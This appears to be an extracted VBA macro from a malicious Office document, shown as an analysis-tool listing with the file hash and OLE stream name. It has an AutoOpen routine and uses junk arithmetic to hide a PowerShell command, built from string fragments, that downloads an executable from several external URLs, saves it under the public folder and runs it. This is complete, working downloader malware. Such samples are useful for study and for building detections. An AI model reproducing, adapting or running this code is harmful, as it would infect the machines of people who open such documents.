Filename     : ./macros/1d869439f6a5b2e51a92b579924395478263b897822bd76124639a0d78fe361b
OLE stream   : Macros/VBA/NOLuPwUpYIZO
VBA filename : NOLuPwUpYIZO.bas
----------------------------------------
Attribute VB_Name = "NOLuPwUpYIZO"
Sub AutoOpen()
On Error Resume Next
ftOwMiZna = JnRmFrdRrsWSwr - ELLvjwAHjtWC / (6798045 + fwwzdKusK - 7575552 + IOkrbNvWRI)
XNsrzJfit = puBMuaSUhmLA - bbkPQHfafS / (1444996 + lDIjBPJR - 816557 + NNYwBvbpizW)
oRPNuPaNI = ctEJWJnf - CjUwNWqTGk / (9906137 + oKkwmsTGAjDvU - 7281237 + UnilnJGunU)
Application.Run "urjTlXbAJ", ldkwWcCmmG
VCqEvTdJT = jTMkQUYXTjYbb - VjcwMjh / (3017230 + cQqcCEPZmBwkAb - 8884670 + SkibGvtani)
PrfwmGTWj = arVTDHmadS - EidtwwoqjX / (3085993 + UoXtpOrRiraua - 2838546 + XzJSwVMKJ)
End Sub
Function ldkwWcCmmG()
On Error Resume Next
NCTBrZKjXj = XTWJszZAtwt - wVGFzXQbTQ / (3902557 + dzzuTTUYI - 1017571 + OuQwBkcTBUp)
EOzHEA = ppivdzPLH - FfswfjaiUNsqsK / (6806671 + PqqzTwoiJE - 8027373 + qZsuXPpkFC)
ILwBHbFY = vsWAbYw - TLEkYUJfIrKoar / (429997 + vVwSdVzSMlvFw - 9216022 + JLGWMmpT)
VKfndJ = KdMzOLPKwjuAQr + Mid(("bS(('& ( jIlVErBosEpREfErENCe.tOsTriNg()[1,3]+AnWJUZiU"), 3, 44)
wowQbZhfubi = GZjUzMm - nYEiMfAdTU / (8081776 + FCYDtpG - 4476737 + HrONqFkimZzASj)
RlfpRSEn = KBTMukK - AizEAcbHFOYj / (6369755 + VWaQwhvqBnWXt - 8478121 + ucOwIOfrBj)
GScbIVl = KRtltAU - fzmildnKhL / (6549096 + ijlLmKjYbqi - 4714837 + wWiwPtWDYMYH)
ULGoBoGjY = OjjsvOiEqj + Mid(("YSjNjtI3uston.cGo3+dZam"), 8, 12)
YjNAdizB = vtoSOwpGJ - RRLZKWNEn / (6578556 + EXszFacuw - 2942338 + KFIfXFtBm)
DdpBz = KqjNHjJF - dLBAqVwTJ / (4199935 + LKzAHGRi - 9734086 + LlvDujMl)
ujSabFEFnQB = uTpjmEJFRJbmkf - BztfGBPiGKR / (4939036 + zwpjiLb - 8640359 + dLwzBzUWVb)
HEHTjERYDG = cTUEzfTGTbfhzj + Mid(("qhSNiex(NUztGGpwzGYuvi"), 5, 4)
AYBWJWJAu = pjWUfEHVUsE - EhfWhjJAQJ / (6872787 + qTjvCBDDPwDmH - 8295207 + ttiAiQCBo)
wabGAHai = YFzVwOfzhd - UMTSpAJH / (5613255 + OqSPGmJFYoSvZ - 5828550 + FiTiYmaNFZjKhp)
iSqLNRAs = tuLdJPiFp - VuIptYnoWjR / (8150134 + EGodNqZbcP - 1532832 + XkvVjaddFCsRXL)
LStqzDGBmp = VBunjiw + Mid(("Gdws,[chAr]92-Re'+'pLaCE  ([chAr]8p1T+p1T7+[ch'+'Ar]81+[chAr]p1T+p1T49),[c'+'hAr'+']96-Crepm7T+m7Tl'+'acE  Go3NK1Go3,[chAr]36  -CreplacE Go3FK9G'+'o3,[p1TUTSBEUa"), 5, 150)
jCREDozfAV = XUmROPBt - AuVorTqIoMT / (369911 + XFBpfERJJ - 8560517 + dYAuJON)
iZWzZaKwvo = INQdqLC - UzKpBEJ / (9469547 + QZjwcVrBSLSS - 9201396 + ZwPtAGbKdcCzLw)
EqjSu = BYPDNsp - HjrZcXAkjYw / (7172585 + mLIqFFvGuiKtz - 3406888 + CPiGjUIMJhzn)
ouBbmtmOXm = tWKGwCV + Mid(("zpZKociL6uHQfzGo3+Go3p1T+p1T6 cfwRLGtEsAoGBFzENHNTFWNdboisvrI"), 9, 22)
rFMqQRi = uXNBhfcFNiUpr - WizzJGR / (3442002 + bFzjnCavC - 5241129 + pzuKcBWhPK)
YtGPrBkhI = jWLplNHDAVcIlv - zpDnmROXLYjo / (4451194 + kjCEcWbU - 9607787 + MnzawNoJO)
VQjHuDj = CjibXhUwzQCYk - QlaEIZIirlawRo / (4753400 + jZZiFDFajvBcVh - 2964662 + DEJNmkBpjXptB)
KYAvpti = sSYNMLPMHMH + Mid(("wbjlnzcPPYK+Go3+Go3f'+'z6Gp1T+p1To3p1T+p1T+Go3wfz6+fz6Go3+Go3-objectfGo3+Go3z6) System.NGo3+Go3et.We'+'bClGo3+Go3i'+'Go3+Go3enp1T+p1TGo3+Go3m7T+m7Tt;NK1NSBGo3+Go3 dURqNjATkkfcCMtNkqcVDHhESFb"), 12, 152)
AWkhV = zXNXjJKWmuM - LLzYkviNLZH / (5948768 + CUAmpzPwhm - 2461189 + SCOiXOiDCOohD)
RDdMa = KHzUaQiBd - KjzzzidYmkRsT / (6717781 + KcbTnfSibnHwN - 2370752 + FQZYUnQhGUkQvT)
zULqJfv = RnQfPnHipKrAWJ - lQMqiBTuOBuvU / (9790296 + PXPiWUj - 6521942 + IwijOdnuXRiUDE)
HvwKUc = QjZAjcwFpN + Mid(("CqzNi+m7'+'T1i'+'WQ1NgFG'+'o3+Go3K9()Go3+'+'Go3SbdwaISlF"), 6, 42)
NcnFnfKPq = nUFiPijTkfkNz - DQiLSajYcd / (703509 + PMwwUJCDkwd - 7278808 + WIcOMRQWUjTEj)
nQDOPwRPJ = KHPsbio - TUnLbLwmG / (7360417 + YvSHJPLnFucisk - 1509203 + vVECGwEoHaAqF)
dApnjJjYV = hchHKFrAFc - rjXrqvbTS / (174535 + CkpZrdAjP - 4002156 + fMAzkZCAvQbm)
ikTmwBmKz = vwsCiVsmjmuUk + Mid(("GlZzVqARZPKEFzI.cop1T+p1TGo3+Go3m/hsJDiSGo'+'3+Go3/fz6.Splim7T+m7TtGo3+Go3(fz6?Go3+Go3fz6Go3+Go3);NKGo3+Go31SDC = NK1eGo3+Go3nv:Go3+Go3publicGo3+Go3 + fznbUoFEHi"), 16, 138)
koDDJjDBN = ZzRlOOzVN - KEKqtKBRRFAbza / (2098624 + fjDpzuGw - 5048797 + TonmvuNrEKWGXU)
pvMrJkH = GVTPwzqaEi - RXzPzOQtr / (2398663 + fKGNGWAnZMi - 3401796 + ZnjbzcOiDfcpt)
lqmCu = MIqddLcpIJktU - RJDiGGqKhp / (8802535 + wvcidXMho - 5967707 + iFGOjiWqGHoR)
ZuZvtRdbCTb = OhzQfZXnY + Mid(("MvhUhhhCSDuGH+'3+m7T+m7TGo3KGo3+Go'+'39(NKwltRubXIkJkROsI"), 14, 29)
FJJEvICkqT = NjnllaVdArG - KwnHJdhDjna / (6686416 + EhwqshWAqdaT - 595980 + TGQjvrWPCwH)
kawfsK = EfazZGF - hsWnHJkfUUMoGz / (2710989 + SEirPofBjndqas - 785540 + ODwbjdclHr)
juWomYcTAH = hkSwGRdiVbNjtN - DTftEbQsZC / (9824124 + NpbtkYtzRQpX - 4807279 + OisATEOOZIFNmT)
psMtAACR = bujmwBaBjONhNd + Mid(("ISLbdIZCEYIsbA= Go3+G'+'o3NGop1'+'T+p1T3+Go3K1nsadGo'+'3+Go3asd.next(1Go3+'+'Gop1T+p1T3'+'0000,Gp1T+p1To3+Go3 2cwmidtZbiiIQNsXw"), 15, 97)
soXiVucj = KzPDmiIUINi - YiuYwPT / (7579225 + mZjaXuPufZ - 7991464 + WJFwLmiw)
VQokUuiHOBY = iGirUMNGSZZvG - ZjdPjtacos / (8078960 + Zoamcpq - 5950782 + TziDhBnN)
RvBIPnWA = POQkfPiXuDRBRq - SnYjjwk / (859037 + QFluMCrmOoc - 5216303 + pJKEFunNGCGj)
nEHaFsZ = rtvHiQpti + Mid(("RCRNm7TXm7T'+'-JOinm7Tm7T) (((m7T . ((gEt-VARiAb'+'lE p1T*mdR*p1Tm7T+m'+'7T).na'+'ME[3,11,2]-J'+'oInp1Tp1T)'+'(((p1T((Go3NGo3+Gm7T+m7TjOJTOIEljqMCkJCRupikmkdBhfbda"), 5, 130)
QQJnDYpFzw = rLindNaj - OVbrpROKDiNaIO / (5986428 + mwQzVkhQtDbj - 3653989 + tGEvOmFLqt)
ZwcBrimZWwS = JVwZkjzzFqR - jcinLzmp / (5939625 + ilHWMzsbaGXWL - 2840452 + qJTijNibwVTk)
cltGVMaUpra = tNDDvSrMSOWzGd - KmNRPFUoS / (2193483 + iwJKAtPuhMCTas - 4559535 + YuzjdjRRKI)
VMcCjaJAB = udHhCfKoUZdn + Mid(("wRCaCvYjBt?http://peG'+'o3+Go3rformGo3+Go3ance3'+'60.dk/Go3+Gp1T+p1To3z'+'C2'+'Go3+Go3yGo3+Go3BGo3+Go3p1T+p1Ts0/Gp1T+p1T'+'o3MOrkvzhdIOHukcKUNJcUMsqT"), 11, 115)
ISzduvhI = uDHNdiMvDHSmY - jwtVfRuiszsrv / (168693 + mRbaEdSQ - 6354058 + wQnOJrVdcJ)
MvCwqcvw = jQNitQKHVlm - nQqrMTOR / (6225519 + BhBHPjIW - 2740375 + rjGBNrKMH)
flQnLiL = LiLFAwTA - JNswUPjh / (7331809 + bzwXUUG - 1934919 + dVICJYASWvHRP)
UizPMlh = UtZZlsA + Mid(("SzcnwdqHEjwqcblllJRYQfTrAr]39) )m7T) -cRe'+'PlAcE  ([chAR]112+'+'[chAR'+']49+[chAR]84),[chAR]39) '+')')-crEPLACe 'm7T',[cHAR]39-REPlaCE  ([cHAR]106+[cHAR]73+[cHAR]108),[cHbpCc"), 26, 146)
slVinWS = YMjINLqk - odWoALjXUwKmii / (2223456 + lSOVWYDvLkpcP - 7558446 + fLNdmlYE)
jZjViqpuAYQ = PMRpXXtiUQbscO - PaacQVGIjp / (5948787 + REZGNOUGJGO - 4657456 + qLHwMOCwqOMLv)
RbKzLJ = YIDlzswcZvKNi - INJLCoaJ / (9842989 + UbbibqMv - 3473441 + wwFVOfsNmMn)
jdUPYpJi = MEFwkllh + Mid(("pwaEqjruQSE1T+p1TGo3+Go3dGom7T+m7T3+Go3om;Np1T+p1TK1YYU = .(Go3+Go3fzGo3+Gom7T+'+'m7T36m7T+m7TneGo3+Go3fzGo3+Gp1T+p'+'1To36Go3+Go3jBHsmalidIhRSDXFaJBNljLHSuUh"), 12, 119)
ooGcbzEUJW = RBjiPvDLJ - ozWvMXnV / (4313952 + jqwlMmKNhpLEq - 2815830 + MDdYCfkiUQD)
mGDQEa = LAqVYtfkaCzV - kqdTwjGIVAU / (1871835 + TMwMdVJAzMqUnL - 2145881 + zKGHuRpGLYj)
PSuODHF = dqAVMbaTnOYbMc - dmzIYvdVqOCC / (397395 + pAFoMWIMVI - 2334881 + rqllivRjMTLQ)
qlGsYPR = jvocEAIHNOIuQX + Mid(("mRDBKkfvzYHIGSqUIalXaovTwmGo3+Go3+ Nm7T+m'NiDGSiudTjb"), 27, 16)
BEbLS = zNTmzGcRRrwnDn - EkHkVKWppfLX / (7608934 + OwnMusX - 3491028 + vLDvCUTVwMlFW)
UfOAODDPJto = nCmbYiG - jpPDtJaJuMmrL / (4745279 + PUUVKMKCw - 8277125 + zKHQwnlHcOfwbK)
pwiGbFIw = pRYTiqPjXHEIwb - nTMzJPBiOw / (1260285 + vEjVtLP - 4574909 + dcMFkbjIufpfE)
WzNBFM = BzVKHJYY + Mid(("wfZDGfRCVE([Char]71+['+'Char]111+[Char]51),[ChaTqoYYmIjwrMuihXaGfNzhkAdvGnTzR"), 10, 38)
vTBrvwMN = iomKwhDfJ - ArZnRVTTRZrdW / (6839634 + KjkGSHnTQ - 9397455 + WjiIbZRWlmbrVR)
OpYDfwD = BHMbBRCvmzTZq - MYIqWwjkJzSM / (73260 + cjrOobGjGpvdUo - 9276215 + IzanYNTA)
rZpYMFnhD = THRzPJoRESDGEk - cjSTvtivo / (9741988 + SlNZPPqPVUoir - 6091067 + LPVtEDPL)
OYvdWDV = MliAfnnKUYm + Mid(("dVAmOKWom7T+m7T3KGo3+Go31nsGo3+Go3adasm7T+m7Td = &(Go3+Gm7T+m7To3fGo3+'+'Go3z'+'6nGo3+Go3fz6+fzGo3+Go36em7T+m7Tfz6+fz6Go3m'+'7T+m7T+Go3w-objecfGo3+Go3z6+fz6'+'tfzGo3+Go36) rp1T+p1TGo3+Go3anpqaQ"), 8, 183)
dBdYou = ZqCEfDnPoPunzb - ohPZvumDaChUP / (7089192 + jIMjRoEH - 7012357 + FoOzQWuUM)
UNEirGpOPc = XZmhEnncC - iYiijmbOJwkaiH / (8052935 + XEKfmAC - 3732735 + HWfiiBbFmjhK)
zFoFotZ = PdvjKOhzuirz - jRWKiVLsc / (3043334 + jizIVrXIvnohkG - 7940520 + moMrniPRKicBL)
JGurt = svAFFoLc + Mid(("UNRs+m7'+'TC);break;Go3+Go3}catp1T+p1Tchm7T+m7T{}}Go3)p1T+p1T  -RepLaCE  Go3fz6Gom7T+m7T3,[chAp1T+p1Tr]39-CreplacE Go3uHQGo3EavNYVk"), 5, 120)
jHirzcWt = klEthZDPYIFPfz - PWzwwBTlKIYN / (2445302 + jFanXazX - 1468044 + ZoXpqrRkbpm)
cUOUwI = lIftQztkJLqF - DicIWorOTWHdd / (9094686 + rnlXWwTRH - 5680168 + ziXUOzRB)
izuSh = MpcEAvWSmXQmE - tVaTjpjNUfM / (8292510 + rwIKLcIGC - 2186248 + WbcBfjNXtDdw)
MSiGb = rnNwwjQYcCHiEb + Mid(("nXjrnbRMjHHaGjUpSwBDXwZHwtfnBk+Gom7T+m7T3?http:p1T+p1T//wm7T+m7Tww.sup1T+p1TlGo3+Go3p1T+p1Tkypro'+'Go3+Go3jecGo3+Go3tG'+'o3'+'+Go3cGo3+Go3onsGo3+Go3u'+'ltinGo3+G'+'m7T+m7To3gBAwJcIOHh"), 31, 144)
jApKiuz = EKwUqKtzH - iilRpzKNz / (3905747 + dQEHhOoMuzjB - 4294650 + Mzjnoujb)
ltDHGziv = VRjfDLWQVJfbtr - IwFkMPBj / (2871705 + cAbaLaBB - 3486202 + qwjlBXjLrqhS)
icSSFWr = WisovOj - kUWaLvqJj / (5819612 + bIWKMUjoiq - 8052565 + bJvEwSlFmj)
JuNjvs = diLDzUwsJhiUi + Mid(("ztULbMCD1aGo3+Go3sfcGo3+Go3.Go3+Go3FK9Go3+G'+'o3ToSGo3+Go3trWQm7TFj"), 9, 57)
wVftVlLAdih = HrwAUfUM - AduwuQPrur / (9755730 + nssPjzJtNs - 7774178 + LTSwDbnQtMjn)
waRPl = iSuZkvKI - UwElofLSMHoLk / (5246131 + RnSDiiaJEDzhPT - 5475967 + daXzUtSnHFbzbw)
zQjfnBfC = zqwIzcG - JupzhqzvwkK / (2077290 + McdXUivdDahG - 450661 + rSLfUWzOEfukzK)
SZzai = GiMKpbqBH + Mid(("zKRwdE, NK1SDC)Go3'+'+Go3;&Go3+Go3p1T+p1T(fYvZAb"), 7, 37)
wAfaizHfWb = cwLzFTHtfqGd - FpnlzXwdjhlTb / (2086722 + SmOczaCWL - 506884 + kXAFGDjo)
wWGCkwjQ = czdorUHs - ZdiJrasci / (5678759 + CTciomaci - 5133580 + nmAoSJaliSJF)
OqibJ = ZibjZMiZCbII - uzFufOprpr / (1658726 + IjCtwvs - 2682779 + JJKtCRwJlLsfv)
TjiRYJ = cPRnPlOT + Mid(("KdTaQsENJl+'7TKGo3'+'+Go31NSB + (fzGo3m7T+m7T+Go36.exfzGo3+Go36+fz6efGo3+Go3z6);foreacGo3+Go3hGo3+Go3(NK1asfGm7T+m7T'+'o3'+'+Go3c in NK1ADCX){try{NK'+'1YYUm7T+m7'+'T.FK9DoWQm7T+m7T1WnlGo3+Gom7T+m7T3WGo3+Go3Q1pE"), 11, 198)
zulXvSl = dRdbfEfPu - kpuAcwtiEjQX / (2452837 + bNNIwwvaWr - 3116624 + oUdhfclOdklk)
jFXYJXhksq = wWMiGCFF - ASqXTwlK / (3732804 + krIZEXA - 7666882 + wrrbdzzcjwPo)
JEkDtXZ = fjUKqIJo - TRhzSqwHGFP / (3705753 + QIqMZVUC - 2762035 + PaLcFtj)
vmKal = ajknvPujn + Mid(("vfZYaUIBsBGImJIui821Go3'+'+Go333);N'+'K1m7T+m7TGo3+Go3ADCX = fGo3+Go3z6 Go3+Go3http://empresGo3+Go3asGo3+Go3maissau'+'daveis.taketGo'+'3+Go3hewind.dnsaliGo3+Go3as.com/J9HuCGo3p1T+m7T+m7Tp1T+Go3/ZaLawFmrum"), 18, 177)
hzZpoCF = rZPLUiioUa - NRZGOrN / (4968814 + kVlsiwiv - 2737292 + aZtqimNtZCKqd)
vzpfZtMQ = TMcEXsnNPzoVoW - XwnZfAfUaqT / (267442 + nXBusqYWTdXVBM - 1834657 + CNwqRCGXQzuorB)
IpAkpbmLsvN = DroZsvudz - FESPEdnWZYdVLj / (7264469 + iduwkiRQT - 5826334 + nRzIkBsL)
wHNoDKX = izVYauiiHfbpK + Mid(("QYUnVquVJdYHwCTlOadFIWQ1Go3+Go'+'3leFGo'MjzN"), 17, 24)
AqSwwPlvq = QiBNbnCwZ - AEZQtTTVo / (5567389 + QapSMnfkwE - 9811495 + hrBAikKmLmDGN)
zcEGbhiz = NrPNmzwvzHLvO - WLbLBOrYrToldq / (2004473 + XjETaoVlSzs - 7368302 + toiVLPAKrEzAp)
sSrdGv = vYBWHlVkcquYhp - tCVFjwfGPSbKT / (6011991 + FSlpaNQclBW - 1663956 + samhKUwC)
bVjaK = oHMUGSSdkijIob + Mid(("sRNwdcn'+'3emfzGo3+Go36)(p1T+p1TNKGo3+Go31SDm7TtOUCjAjsdcUNaUuKC"), 8, 40)
ptChdOWXoh = kbnsPdcZkEKpSN - ftzzjccXdnJvi / (4782859 + aUDOHwz - 7934712 + qVdsqzLzEwYmaC)
aZlJk = VIEKEFiwAf - pmEGqjEFILz / (6957607 + fbMqiASzSitz - 8915376 + koIXcMMHZtzGs)
ENitzbQjir = VtNWXXfdtrQA - iXIKGwrTQ / (116473 + WXUXCSsbHjdYR - 4472267 + XJHvQHczikR)
SzAHKKHw = vIBQSlEfaBF + Mid(("HthTCtqlNAR]36) )m XJldwzWN"), 10, 8)
SdpihdTQuX = wosdAzqnfZh - VkjuXlnl / (6932257 + RGUZfsX - 5205088 + BjURTkWhka)
iFYboahWmii = MlTCjIsFcRUpqz - lIbUwPEFff / (309726 + NKBECKopj - 7499201 + qWzSwChrd)
OwFwJkc = wwNGQbfIfo - hqivbNSiCH / (8191366 + qlzwzFCwnYzRLn - 9627125 + jJhAwvIfVWXp)
iOlZMVQDzM = rKBPEtZzADHa + Mid(("jsjQNqGz.it/lIGo3+Go3tY/Gm7T+m7To3+Go3?Go3+Go3hGo3+Go3ttp://Go3+m7T+'+'m7TGo3wGo3+Go3ebsitedesigGo3'+'+Go3nhoGo3+GoimBuEknj"), 9, 107)
JfNoNVPCD = CdpjJsNjnPju - aqzvcSdbiNjaz / (7021176 + LQcTGbfX - 1840011 + zmHmjaiS)
kHwjwJFz = nPAbsAzGTPFI - IBYWmMoR / (9009067 + qjcfVoznB - 1608155 + zwLpkTHUL)
XVKqQDi = DDniGOMo - dRswKsQVdS / (3952955 + EAzLFMhBthw - 6781052 + mfoAPZmw)
zYDlqSFa = NbNFzXVSc + Mid(("RqckDTvqvZZz6Invofz6+Go3+Go3m7T+m7TfzGom7T+m7T'+'3+Gp1T+p1To36kfz6+fm7T+m7Tz6e-Im7T+m7TtGo3+GowiDVThpqLaqPhCYfFiaEcjwc"), 12, 83)
jTGwF = zDqTBBfmcwU - lYMbUOsi / (5674861 + VzFFLkivDu - 8505986 + mczhNXGMBhd)
OVrjDjoQVnJ = NdksdPJICZirNv - uEhsZQGljdmAU / (5329585 + YnWJrhAqS - 7823578 + jdNuGURhMIUp)
FKmHiFwE = fHrAOqO - jlBuVDEIuNPEp / (6366076 + YpXSinPIDwS - 5870736 + pzbbawCsLzlQ)
jllhuW = izFzBwTzdCr + Mid(("mkmtjFOnGo3om/6ap1T+p1TTQfW/p1T+pm7T'+'+m7T1T?hp1T+p1TtGo3+Go3tGo3+Go3p:Go3+Go3//gGo3+Go3rupoGo3+Go3-Go3+Go3vivaG'+'o3+Go3pTOIEXrcaVGRzUDzIw"), 9, 114)
Vicajsw = rYfBRczw - ZTSumnd / (8607612 + lMplBUOzOwN - 872786 + GWnkDuulPOD)
WowDAW = ruGWIRHVTsHV - WKnTOwi / (9554461 + MwHBkjzsVzlBK - 5146582 + aGhGjMOO)
kNWibKtNO = ihjHRBPVl - hKPGhXXbWJkEMk / (6002142 + HRcOjwhoWDzpb - 3794315 + QQLtzKzAiLlr)
OQVRACzBPi = ZRuFkOwdT + Mid(("sQIakJN+p1Tcp1T+p1T'+'hAr]34) '+'2Xa invOKe-eXpreS'+'siONm7T+m7Tp1T)  -rEpLaCE pm7T+m7T1T2Xap1T,[Char]124m7T+m7T-rEpLaCIJaTNkcUd"), 8, 112)
ldkwWcCmmG = WFzvaspiHHMdGr + haVzcYt + YCXHLUiPFNf + ChrW(34) + sXSjcbkdYhzDbT + HEHTjERYDG + VKfndJ + nEHaFsZ + OYvdWDV + jdUPYpJi + KYAvpti + psMtAACR + vmKal + VMcCjaJAB + MSiGb + iOlZMVQDzM + ULGoBoGjY + jllhuW + ikTmwBmKz + ouBbmtmOXm + qlGsYPR + TjiRYJ + wHNoDKX + ZuZvtRdbCTb + JuNjvs + HvwKUc + SZzai + zYDlqSFa + bVjaK + JGurt + LStqzDGBmp + OQVRACzBPi + WzNBFM + UizPMlh + SzAHKKHw
oAqhiIQtD = GcGvizNCZjXssK - jOWKdlodOm / (3899581 + vpkhzTXc - 154768 + ovYUzdrwvI)
jMwuujZJR = sJOrSNoBYZVhTP - bmIoLmRrMc / (6550614 + qnPtNKCbfhhCk - 7745472 + YWmztjUTzRVGM)
bRBOkWwOI = HWRoutFGEXv - VZdoHWTScrEqAO / (6077290 + SNpbPqfcb - 9038215 + ZsLRjQhvclv)
End Function
